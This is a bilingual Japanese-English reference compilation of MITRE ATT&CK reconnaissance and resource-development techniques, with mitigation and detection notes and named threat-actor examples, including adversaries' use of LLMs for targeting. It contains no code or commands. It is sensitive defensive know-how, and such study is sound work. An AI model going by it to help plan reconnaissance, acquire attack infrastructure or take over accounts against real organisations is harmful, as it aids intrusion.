非公式日本語参照データ。© The MITRE Corporation. https://attack.mitre.org/ 敵対者は標的選定に使える情報を集めるため、能動的な偵察スキャンを実行することがある。能動的スキャンは、直接的な相互作用を伴わない他の偵察と異なり、ネットワークトラフィックを介して標的インフラを直接探査するものを指す。 Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction. 敵対者は標的選定に使える情報を集めるため、標的のIPブロックをスキャンすることがある。公開IPアドレスは組織にブロック単位、または連続するアドレス範囲で割り当てられることがある。Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. 敵対者は標的選定に使える脆弱性を求めて標的をスキャンすることがある。脆弱性スキャンは通常、標的のホスト／アプリの構成（ソフトとバージョン等）が特定のエクスプロイトの対象と合致しうるかを確認する。Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application potentially aligns with the target of a specific exploit. 敵対者はブルートフォースやクローリングの手法でインフラを反復的に探査することがある。Brute Force(T1110)と似た手法だが、目的は有効な認証情報の発見ではなくコンテンツやインフラの特定にある。汎用的な名称やファイル拡張子、特定ソフト固有の語などを含むワードリストが使われる。Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. Its goal is the identification of content and infrastructure rather than the discovery of valid credentials. 本技法は、企業の防御・制御の範囲外で行われる挙動に基づくため、予防的統制での緩和が難しい。外部に公開されるデータの量と機微性を最小化することに注力すべきである。 通常と異なるデータフローがないかネットワークデータを監視する。普段ネットワーク通信を行わない、または初めて観測されるプロセスがネットワークを使用している場合は不審である。期待される標準やトラフィックフローに従わないプロトコルに関連するトラフィックパターンやパケット検査を監視・分析する。 In the Triton Safety Instrumented System Attack, TEMP.Veles engaged in network reconnaissance against targets of interest. 敵対者は標的選定に使える、標的のホストに関する情報を収集することがある。名称・割当IP・機能などの管理データや、OS・言語などの構成情報が含まれうる。 Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include administrative data (name, assigned IP, functionality) as well as configuration specifics (operating system, language, etc.). 敵対者は標的のホストハードウェアに関する情報を収集することがある。種類やバージョンに加え、防御強化を示唆する追加コンポーネント（カード／生体認証リーダー、専用暗号化ハードウェア等）の有無が含まれうる。Adversaries may gather information about the victim's host hardware that can be used during targeting, including types and versions, as well as the presence of additional components that might indicate added defensive protections (ex: card/biometric readers, dedicated encryption hardware). 敵対者は標的のホストソフトウェアに関する情報を収集することがある。種類やバージョンに加え、防御強化を示唆する追加コンポーネント（アンチウイルス、SIEM等）の有無が含まれうる。Adversaries may gather information about the victim's host software, including types and versions, as well as the presence of additional components that might indicate added defensive protections (ex: antivirus, SIEMs). 敵対者は標的のホストファームウェアに関する情報を収集することがある。種類やバージョンから、構成・用途・経年／パッチ適用状況など、ホストに関するさらなる情報を推測しうる。Adversaries may gather information about the victim's host firmware, including type and versions, which may be used to infer more information about hosts (ex: configuration, purpose, age/patch level). 敵対者は標的のクライアント構成に関する情報を収集することがある。OS／バージョン、仮想化、アーキテクチャ（32／64ビット）、言語、タイムゾーンなどが含まれうる。Adversaries may gather information about the victim's client configurations, including OS/version, virtualization, architecture (32/64 bit), language, and/or time zone. 本技法は、企業の防御・制御の範囲外で行われる挙動に基づくため、予防的統制での緩和が難しい。外部に公開されるデータの量と機微性を最小化することに注力すべきである。 訪問者からホスト情報を収集するよう設計された悪意あるコンテンツのパターンを、インターネットスキャナで探索しうる。この活動は発生頻度・誤検知率が非常に高く、標的組織の可視範囲外で行われることも多いため検知は困難。初期アクセス等の関連段階での検知に注力するとよい。 Volt Typhoon has conducted pre-compromise reconnaissance for victim host information. 敵対者は標的のID情報を収集することがある。従業員名・メールアドレスといった個人データや、認証情報・MFA構成などの機密情報が含まれうる。 Adversaries may gather information about the victim's identity, including personal data (employee names, email addresses) as well as sensitive details such as credentials or MFA configurations. 敵対者は標的選定に使える認証情報を収集することがある。標的組織に直接関連するものや、個人・業務アカウントでパスワードを使い回す傾向を悪用したものがある。Adversaries may gather credentials that can be used during targeting, taking advantage of the tendency for users to reuse passwords across personal and business accounts. 敵対者は標的選定に使えるメールアドレスを収集することがある。内部インスタンスがあっても、組織は公開向けのメールインフラや従業員アドレスを持つことがある。Adversaries may gather email addresses that can be used during targeting. Organizations may have public-facing email infrastructure and addresses for employees. 敵対者は標的選定に使える従業員名を収集することがある。メールアドレスの導出や、他の偵察活動の方向付け、より信憑性のある誘い（ルアー）の作成に役立てられる。Adversaries may gather employee names, which can be used to derive email addresses and to help guide other reconnaissance efforts or craft more-believable lures. 本技法は、企業の防御・制御の範囲外で行われる挙動に基づくため、予防的統制での緩和が難しい。外部に公開されるデータの量と機微性を最小化することに注力すべきである。 単一の送信元からの大量・反復的な認証リクエストなど、ユーザー情報の探索を示唆しうる不審なネットワークトラフィックを監視する。Webメタデータの分析により、referer や user-agent 文字列などのHTTP/Sフィールドから悪意ある活動に帰属しうる痕跡が判明することもある。 APT32 has conducted targeted surveillance against activists and bloggers. Contagious Interview has researched specific professional groups such as software developers for targeting, and also individuals working in cryptocurrency and blockchain roles. FIN13 has researched employees to target for social engineering attacks. HEXANE has identified specific potential victims at targeted organizations. LAPSUS$ has gathered detailed information of target employees to enhance their social engineering lures. Magic Hound has acquired mobile phone numbers of potential targets, possibly for mobile malware or additional phishing operations. For Operation Dream Job, Lazarus Group conducted extensive reconnaissance research on potential targets. During Operation Wocao, threat actors targeted people based on their organizational roles and privileges. Scattered Spider has used information from previous data breaches to identify employee names to be used in social engineering. Star Blizzard has identified ways to engage targets by researching potential victims' interests and social or professional contacts. Volt Typhoon has gathered victim identity information during pre-compromise reconnaissance. 敵対者は標的のネットワークに関する情報を収集することがある。IPレンジ・ドメイン名などの管理データや、トポロジー・運用に関する詳細が含まれうる。 Adversaries may gather information about the victim's networks, including administrative data (IP ranges, domain names) as well as specifics regarding topology and operations. 敵対者は標的のネットワークドメインに関する情報を収集することがある。所有ドメイン、管理データ（名称・レジストラ等）、連絡先（メール・電話番号）、事業所住所、ネームサーバなどが含まれうる。Adversaries may gather information about the victim's network domains, including registrar, contacts (emails, phone numbers), business addresses, and name servers. 敵対者は標的のDNSに関する情報を収集することがある。登録ネームサーバや、サブドメイン・メールサーバ・他ホストのアドレッシングを示すレコードが含まれうる。MX/TXT/SPFレコードはOffice 365やG Suite等の第三者クラウド／SaaS利用を露呈しうる。Adversaries may gather information about the victim's DNS, including registered name servers and records that outline addressing for subdomains, mail servers, and other hosts. MX/TXT/SPF records may reveal third-party cloud/SaaS providers. 敵対者は標的のネットワーク信頼依存関係に関する情報を収集することがある。接続済みで（場合により昇格された）ネットワークアクセスを持つ第二者・第三者組織／ドメイン（MSP、請負業者等）が含まれうる。Adversaries may gather information about the victim's network trust dependencies, including second- or third-party organizations/domains (ex: MSPs, contractors) that have connected and potentially elevated network access. 敵対者は標的のネットワークトポロジーに関する情報を収集することがある。外部公開・内部ネットワーク環境の物理的／論理的配置や、ネットワーク機器（ゲートウェイ、ルータ等）の詳細が含まれうる。Adversaries may gather information about the victim's network topology, including the physical and/or logical arrangement of external-facing and internal network environments, and specifics regarding network devices (gateways, routers). 敵対者は標的のIPアドレスを収集することがある。使用中のIPの把握に加え、組織規模・物理的所在地・ISP・公開インフラのホスティング先や方法など、標的に関する他の詳細の導出を可能にしうる。Adversaries may gather the victim's IP addresses, which may enable an adversary to derive other details such as organizational size, physical location, ISP, and where/how their public-facing infrastructure is hosted. 敵対者は標的のネットワークセキュリティアプライアンスに関する情報を収集することがある。配備されたファイアウォール、コンテンツフィルタ、プロキシ／踏み台ホストの有無や詳細、NIDS等の防御運用関連機器の情報が含まれうる。Adversaries may gather information about the victim's network security appliances, such as deployed firewalls, content filters, proxies/bastion hosts, and NIDS. 本技法は、企業の防御・制御の範囲外で行われる挙動に基づくため、予防的統制での緩和が難しい。外部に公開されるデータの量と機微性を最小化することに注力すべきである。 この活動は発生頻度・誤検知率が非常に高く、標的組織の可視範囲外で行われることも多いため検知は困難。初期アクセスなど、敵対者ライフサイクルの関連段階での検知に注力するとよい。 HAFNIUM gathered the fully qualified domain names (FQDNs) for targeted Exchange servers in the victim's environment. Indrik Spider has downloaded tools such as Advanced Port Scanner and Lansweeper to conduct internal reconnaissance of the victim network, and accessed the victim's VMware vCenter which had host configuration and cluster information. Volt Typhoon has conducted extensive pre-compromise reconnaissance to learn about the target organization's network. 敵対者は標的の組織に関する情報を収集することがある。部門名、事業運営の詳細、主要従業員の役割と責任などが含まれうる。 Adversaries may gather information about the victim's organization, including names of divisions/departments, specifics of business operations, and the roles and responsibilities of key employees. 敵対者は標的の物理的所在地を収集することがある。主要なリソースやインフラの所在地が含まれうる。所在地は、標的が属する法域や管轄当局も示しうる。Adversaries may gather the victim's physical location(s), including where key resources and infrastructure are housed. Physical locations may also indicate legal jurisdiction/authorities. 敵対者は標的の取引関係に関する情報を収集することがある。接続されたネットワークアクセスを持つ第二者・第三者組織／ドメイン（MSP、請負業者等）が含まれうる。ハードやソフトのサプライチェーンや配送経路も露呈しうる。Adversaries may gather information about the victim's business relationships, including second- or third-party organizations/domains with connected network access, and supply chains/shipment paths. 敵対者は標的の業務テンポに関する情報を収集することがある。稼働時間・曜日が含まれうる。ハードやソフトの購入・配送の時期や日付も露呈しうる。Adversaries may gather information about the victim's business tempo, including operational hours/days, and times/dates of purchases and shipments. 敵対者は標的組織内のIDや役割に関する情報を収集することがある。主要人物の識別可能情報や、その人物がアクセスできるデータ／リソースなど、標的とすべき詳細が露呈しうる。Adversaries may gather information about identities and roles within the victim organization, revealing identifiable information for key personnel as well as what data/resources they have access to. 本技法は、企業の防御・制御の範囲外で行われる挙動に基づくため、予防的統制での緩和が難しい。外部に公開されるデータの量と機微性を最小化することに注力すべきである。 この活動は発生頻度・誤検知率が非常に高く、標的組織の可視範囲外で行われることも多いため検知は困難。初期アクセスなど、敵対者ライフサイクルの関連段階での検知に注力するとよい。 APT28 has used large language models (LLMs) to gather information about satellite capabilities. FIN7 has compiled a list of victims by filtering companies by revenue using Zoominfo, a business information service. Kimsuky has collected victim organization information including organization hierarchy, functions, and press releases, and has used LLMs to gather information about potential targets. Lazarus Group has studied publicly available information about a targeted organization to tailor spearphishing efforts against specific departments and/or individuals. Moonstone Sleet has gathered information on victim organizations through email and social media interaction. For Operation Dream Job, Lazarus Group gathered victim organization information to identify specific targets. Volt Typhoon has conducted extensive reconnaissance pre-compromise to gain information about the targeted organization. 敵対者は標的選定に使える機密情報を引き出すため、フィッシングメッセージを送ることがある。悪意あるコードの実行ではなく標的からのデータ収集を目的とする点で、フィッシング(T1566)と異なる。 Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. It differs from Phishing in that the objective is gathering data from the victim rather than executing malicious code. 敵対者は第三者サービス経由でスピアフィッシングメッセージを送り、機密情報を引き出すことがある。情報収集の正当な理由を持つ送り手を装う等のソーシャルエンジニアリングを伴うことが多い。Adversaries may send spearphishing messages via third-party services to elicit sensitive information, often using social engineering such as posing as a source with a reason to collect information. 敵対者は悪意ある添付ファイル付きのスピアフィッシングメッセージを送り、機密情報を引き出すことがある。ソーシャルエンジニアリング手法を伴うことが多い。Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information, frequently using social engineering techniques. 敵対者は悪意あるリンク付きのスピアフィッシングメッセージを送り、機密情報を引き出すことがある。ソーシャルエンジニアリング手法を伴うことが多い。Adversaries may send spearphishing messages with a malicious link to elicit sensitive information, frequently using social engineering techniques. 敵対者は音声通信を用いて機密情報を引き出すことがある。なりすまし(Impersonation)や、受け手に緊急感・警戒感を抱かせる等のソーシャルエンジニアリングを伴うことが多い。Adversaries may use voice communications to elicit sensitive information, often using social engineering such as impersonation and creating a sense of urgency. 敵対者は標的選定と作戦を支援するため、LLM等の公開AIサービスに照会することがある。Webやデータベースを直接検索する(T1593)のに加え、公開情報を大規模に統合・集約・分析するためにAIサービスを利用しうる。対象組織・人物の特定、組織構造の調査、利用技術の特定、フィッシング向け連絡先の収集などに用いられる。 Adversaries may query publicly accessible AI services, such as large language models (LLMs), to support targeting. They may use AI services to synthesize, aggregate, and analyze publicly available information at scale. 敵対者は標的選定に使える情報を、非公開（有料・私的・自由に入手できない）ソースから探索・収集することがある。脅威インテリジェンスフィードの有料購読といった信頼できる私的ソースや、ダークウェブ・サイバー犯罪市場などが含まれる。 Adversaries may search and gather information about victims from closed (paid, private, or otherwise not freely available) sources, such as paid subscriptions to threat intelligence feeds or dark web markets. 敵対者は標的選定に使える情報を、脅威インテリベンダーの私的データから探索することがある。有料フィードやポータルは公開報告より多くのデータを提供しうる。顧客名等は秘匿されても、対象業界・帰属主張・有効なTTP／対策の傾向が含まれうる。Adversaries may search private data from threat intelligence vendors, which may offer paid feeds or portals with more data than what is publicly reported, including trends regarding breaches. 敵対者は標的選定に使える技術情報を購入することがある。スキャンデータベースのフィードやデータ集約サービスの有料購読といった信頼できる私的ソースから入手しうる。ダークウェブ等の信頼性の低いソースからの購入もある。Adversaries may purchase technical information about victims, such as paid subscriptions to feeds of scan databases or other data aggregation services. 敵対者は標的選定に使える情報を、無料で入手可能な技術データベースから探索することがある。ドメイン／証明書の登録情報や、トラフィック・スキャンから収集されたネットワークデータ／アーティファクトの公開コレクションなどが含まれうる。 Adversaries may search freely available technical databases for information about victims, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans. 敵対者は標的選定に使える情報を、DNSデータから探索することがある。登録ネームサーバや、サブドメイン・メールサーバ・他ホストのアドレッシングを示すレコードが含まれうる。Adversaries may search DNS data for information about victims, including registered name servers and records that outline addressing for subdomains, mail servers, and other hosts. 敵対者は標的選定に使える情報を、公開WHOISデータから探索することがある。WHOISは地域インターネットレジストリ(RIR)が保持し、誰でも登録ドメインの割当IPブロック・連絡先・DNSネームサーバ等を照会できる。Adversaries may search public WHOIS data, stored by regional Internet registries (RIR). Anyone can query WHOIS for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers. 敵対者は標的選定に使える情報を、公開デジタル証明書データから探索することがある。CAが発行する証明書（HTTPS SSL/TLS用等）には、登録組織の名称や所在地などの情報が含まれる。Adversaries may search public digital certificate data. Certificates issued by a CA (ex: for HTTPS SSL/TLS) contain information about the registered organization such as name and location. 敵対者は標的選定に使えるCDNデータを探索することがある。CDNは分散・負荷分散されたサーバ群からコンテンツをホストでき、要求元の地域に応じて配信を最適化しうる。Adversaries may search content delivery network (CDN) data about victims. CDNs allow hosting content from a distributed array of servers and may customize delivery based on the requestor's geographical region. 敵対者は標的選定に使える情報を、公開スキャンデータベースから探索することがある。各種オンラインサービスがインターネットスキャン／調査の結果を継続的に公開し、アクティブIP・ホスト名・開放ポート・証明書・サーババナー等を収集している。Adversaries may search within public scan databases. Various online services continuously publish results of Internet scans/surveys, harvesting information such as active IP addresses, hostnames, open ports, certificates, and server banners. 敵対者は標的選定に使える情報を、無料で入手可能なウェブサイトやドメインから探索することがある。ソーシャルメディア、ニュースサイト、採用や受注契約など事業運営情報を扱うサイトなどが対象となりうる。 Adversaries may search freely available websites and/or domains for information about victims, such as social media, news sites, or sites hosting information about business operations such as hiring or rewarded contracts. 敵対者は標的選定に使える情報を、ソーシャルメディアから探索することがある。事業に関する告知や、従業員の役割・所在地・関心事など、標的組織に関する様々な情報を含みうる。Adversaries may search social media for information about victims, such as business announcements as well as information about the roles, locations, and interests of staff. 敵対者は標的選定に使える情報を、検索エンジンを用いて収集することがある。検索エンジンはオンラインサイトをクロールしてインデックス化し、特定のキーワードやコンテンツ種別（ファイル形式等）を検索する専用構文を提供しうる。Adversaries may use search engines to collect information about victims. Search engines crawl online sites and may provide specialized syntax to search for specific keywords or content types (filetypes). 敵対者は標的選定に使える情報を、公開コードリポジトリから探索することがある。標的はGitHub・GitLab・SourceForge・BitBucket等の第三者サイトのリポジトリにコードを保管していることがある。Adversaries may search public code repositories for information about victims. Victims may store code in repositories on third-party sites such as GitHub, GitLab, SourceForge, and BitBucket. 脅威アクターは、自身のキャンペーンや、対象業界・能力・目的が合致する他の敵対者の活動について、非公開または公開の脅威インテリジェンスソースから情報・指標を探索することがある。行動の記述、攻撃の詳細分析、マルウェアハッシュやIP等のアトミックな指標、活動のタイムラインなどが含まれうる。これにより将来の作戦計画時に行動を変化させることがある。 Threat actors may seek information/indicators from closed or open threat intelligence sources gathered about their own campaigns, as well as those by other adversaries aligning with their target industries or objectives. Adversaries may change their behavior when planning future operations. 敵対者は標的選定に使える情報を、標的が所有するウェブサイトから探索することがある。部門名、物理的所在地、主要従業員の名前・役割・連絡先（メールアドレス等）といった詳細が含まれうる。事業運営や取引関係を示す情報も得られることがある。 Adversaries may search websites owned by the victim for information, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info. These sites may also reveal business operations and relationships. 敵対者は標的選定に使えるインフラを購入・リース・レンタル・取得することがある。敵対者の作戦をホスト・統制するための多様なインフラが存在し、物理／クラウドサーバ、ドメイン、第三者Webサービスなどが含まれる。一部は無料で取得できる。インフラの取得により、敵対者は自身の作戦インフラを難読化し、検知・帰属を困難にしうる。 Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost. Additionally, botnets are available for rent or purchase. 敵対者は標的選定に使えるドメインを取得することがある。ドメイン名は1つ以上のIPアドレスを表す人間可読な名前で、購入したり、場合により無料で取得したりできる。Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. 敵対者は標的選定に使える独自のDNSサーバを構築することがある。侵害後の活動でDNSトラフィックをC2等の様々な用途に利用しうる。Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: Application Layer Protocol). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations. 敵対者は標的選定に使えるVPSをレンタルすることがある。仮想マシン／コンテナをサービスとして販売するクラウド事業者を利用し、作戦インフラを難読化しうる。Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure. 敵対者は標的選定に使える物理サーバを購入・リース・レンタル・取得することがある。サーバを用いて作戦のステージング・起動・実行を行う。Adversaries may buy, lease, rent, or obtain physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, such as watering hole operations in Drive-by Compromise, enabling Phishing operations, or facilitating Command and Control. Instead of compromising a third-party Server or renting a Virtual Private Server, adversaries may opt to configure and run their own servers in support of operations. Free trial periods of cloud servers may also be abused. 敵対者は標的選定に使える侵害済みシステムのネットワーク（ボットネット）を購入・リース・レンタルすることがある。協調的なタスクの実行を指示できる。Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks. Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. 敵対者は標的選定に使えるWebサービスに登録することがある。後続段階で悪用できる、人気のWebサービスへ登録しうる。Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control (Web Service), Exfiltration Over Web Service, or Phishing. Using common services, such as those offered by Google, GitHub, or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them. 敵対者は標的選定に使えるサーバーレスのクラウドインフラ（Cloudflare Workers、AWS Lambda、Google Apps Script等）を購入・設定することがある。サーバーレスを利用してインフラを難読化しうる。Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. 敵対者は被害者へのマルウェア配布に悪用できるオンライン広告を購入することがある。広告を用いて、特定の場所に成果物を仕込み、有利な位置に表示しうる。Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements. Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites. 本技法は、企業の防御・制御の範囲外で行われる挙動に基づくため、予防的統制での緩和が難しい。外部に公開されるデータの量と機微性を最小化することに注力すべきである。 この活動の多くは標的組織の可視範囲外で行われるため検知が難しい。インフラ取得は外部データセット（ドメイン登録、証明書透明性ログ等）の監視で検知を試み、初期アクセス等の後続段階での検知にも注力するとよい。 Sandworm Team used various third-party email campaign management services to deliver phishing emails. Kimsuky has used funds from stolen and laundered cryptocurrency to acquire operational infrastructure. Indrik Spider has purchased access to victim VPNs to facilitate access to victim environments. Ember Bear uses services such as IVPN, SurfShark, and Tor to add anonymization to operations. Agrius typically uses commercial VPN services for anonymizing last-hop traffic to victim networks, such as ProtonVPN. Star Blizzard has used HubSpot and MailerLite marketing platform services to hide the true sender of phishing emails. Sea Turtle accessed victim networks from VPN service provider networks. Contagious Interview has used services such as Astrill VPN. 敵対者は標的選定に使える第三者のインフラを侵害することがある。物理／クラウドサーバ、ドメイン、ネットワーク機器、第三者のWeb・DNSサービスなどが対象。購入・リース・レンタルの代わりにインフラを侵害することで、作戦中の追跡を困難にし、正規の侵害済み資産に紛れることができる。 Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle. Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. 敵対者は標的選定に使えるドメイン／サブドメインを乗っ取ることがある。ドメイン登録ハイジャックは、所有者の許可なくドメイン名の登録を変更する行為を指す。Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant. Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53). 敵対者は標的選定に使える第三者のDNSサーバを侵害することがある。侵害後の活動でDNSトラフィックをC2等に利用しうる。Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: Application Layer Protocol). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. 敵対者は標的選定に使える第三者のVPSを侵害することがある。侵害したVPSを利用して作戦インフラを難読化しうる。Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves. 敵対者は標的選定に使える第三者のサーバを侵害することがある。侵害したサーバで作戦のステージング・起動・実行を行う。Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a Server or Virtual Private Server, adversaries may compromise third-party servers in support of operations. 敵対者は多数の第三者システムを侵害してボットネットを形成し、標的選定に使うことがある。協調的なタスクの実行を指示できる。Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks. Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale Phishing or Distributed Denial of Service (DDoS). 敵対者は標的選定に使える第三者のWebサービスへのアクセスを侵害することがある。GitHub等の正規Webサービスのアカウントを乗っ取りうる。Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control (Web Service), Exfiltration Over Web Service, or Phishing. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains. 敵対者は標的選定に使えるサーバーレスのクラウドインフラ（Cloudflare Workers、AWS Lambda、Google Apps Script等）を侵害することがある。Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. 敵対者は標的選定に使える第三者のネットワーク機器（SOHOルータ等）を侵害することがある。侵害した機器を中継・難読化に利用しうる。Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not Initial Access to that environment, but rather to leverage these devices to support additional targeting. 本技法は、企業の防御・制御の範囲外で行われる挙動に基づくため、予防的統制での緩和が難しい。外部に公開されるデータの量と機微性を最小化することに注力すべきである。 この活動の多くは標的組織の可視範囲外で行われるため検知が難しい。後続段階（C2等）での検知に注力するとよい。 Indian Critical Infrastructure Intrusions included the use of compromised infrastructure, such as DVR and IP camera devices, for command and control purposes in ShadowPad activity. During APT28 Nearest Neighbor Campaign, APT28 compromised third-party infrastructure in physical proximity to targets of interest for follow-on activities. 敵対者は標的選定に使えるアカウントを各種サービスで作成・育成することがある。アカウントは作戦を進めるためのペルソナ（人物像）構築に使われる。ペルソナ開発には、公開情報・存在感・履歴・適切な所属の構築が含まれ、ソーシャルメディアやメール等で行われる。 Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity. 敵対者は標的選定に使えるソーシャルメディアアカウントを作成・育成することがある。ペルソナ構築に利用しうる。Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. 敵対者は標的選定に使えるメールアカウントを作成することがある。フィッシング等の作戦に利用しうる。Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct Phishing for Information or Phishing. Establishing email accounts may also allow adversaries to abuse free services – such as trial periods – to Acquire Infrastructure for follow-on purposes. 敵対者は標的選定に使えるクラウド事業者のアカウントを作成することがある。クラウドストレージ等を作戦に利用しうる。Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for Exfiltration to Cloud Storage or to Upload Tools. Cloud accounts can also be used in the acquisition of infrastructure, such as Virtual Private Servers or Serverless infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers. 本技法は、企業の防御・制御の範囲外で行われる挙動に基づくため、予防的統制での緩和が難しい。外部に公開されるデータの量と機微性を最小化することに注力すべきである。 この活動の多くは標的組織の可視範囲外で行われるため検知が難しい。後続段階での検知に注力するとよい。 During Salesforce Data Exfiltration, threat actors created Salesforce trial accounts to register their malicious applications. APT17 has created and cultivated profile pages in Microsoft TechNet. To make profile pages appear more legitimate, APT17 has created biographical sections and posted in forum threads. Kimsuky has leveraged stolen PII to create accounts. Fox Kitten has created KeyBase accounts to communicate with ransomware victims. Ember Bear has created accounts on dark web forums to obtain various tools and malware. Contagious Interview has created and maintained personas on code repositories to distribute malicious payloads. 敵対者は標的選定に使える既存アカウントを侵害することがある。ソーシャルエンジニアリングを伴う作戦では、オンライン上のペルソナの利用が重要となりうる。新規にアカウントを作成・育成（アカウントの確立）する代わりに、既存アカウントを侵害して乗っ取ることで、既成のペルソナや信頼関係を悪用できる。 Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. Establish Accounts), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 敵対者は標的選定に使えるソーシャルメディアアカウントを侵害することがある。既成のペルソナを悪用しうる。Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. Social Media Accounts), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 敵対者は標的選定に使えるメールアカウントを侵害することがある。フィッシング等の作戦に利用しうる。Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct Phishing for Information, Phishing, or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: Domains). 敵対者は標的選定に使えるクラウドアカウントを侵害することがある。クラウドストレージ等を作戦に利用しうる。Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for Exfiltration to Cloud Storage or to Upload 